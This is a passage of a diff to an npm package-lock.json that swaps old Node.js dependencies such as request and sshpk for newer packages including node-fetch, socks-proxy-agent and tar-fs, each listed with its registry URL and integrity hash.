"dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "has-symbols": "^1.0.3" }, "engines": { - "node": ">=6" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "function-bind": "^1.1.2" }, "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" + "node": ">= 0.4" } }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">=14" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } }, "node_modules/isomorphic-ws": { "version": "5.0.0", @@ -469,30 +457,10 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, "node_modules/jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } @@ -509,37 +477,25 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" }, "node_modules/jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", "engines": { "node": ">= 10.16.0" } }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -553,25 +509,15 @@ "node": ">=18.0.0" } }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", "engines": { - "node": ">=0.6.0" + "node": ">= 0.4" } }, - "node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "node_modules/mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", @@ -591,76 +537,53 @@ "node": ">= 0.6" } }, - "node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" + "node": "4.x || >=6.0.0" }, - "engines": { - "node": ">=10" + "peerDependencies": { + "encoding": "^0.1.0" }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, "node_modules/oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", + "dependencies": { + "wrappy": "1" + } + }, "node_modules/openid-client": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, "dependencies": { "jose": "^5.9.6", "oauth4webapi": "^3.1.1" @@ -669,469 +592,159 @@ "url": "https://github.com/sponsors/panva" } }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + }, "engines": { - "node": ">=6" + "node": ">= 14" } }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" + }, + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "engines": { - "node": ">=0.6" + "node": ">= 0.10.0" } }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "engines": { - "node": ">= 6" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", + "license": "MIT", "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">= 0.12" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", + "dependencies": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" + } }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" + "b4a": "^1.6.4" } }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + "node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "license": "MIT" + }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/string-width-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": 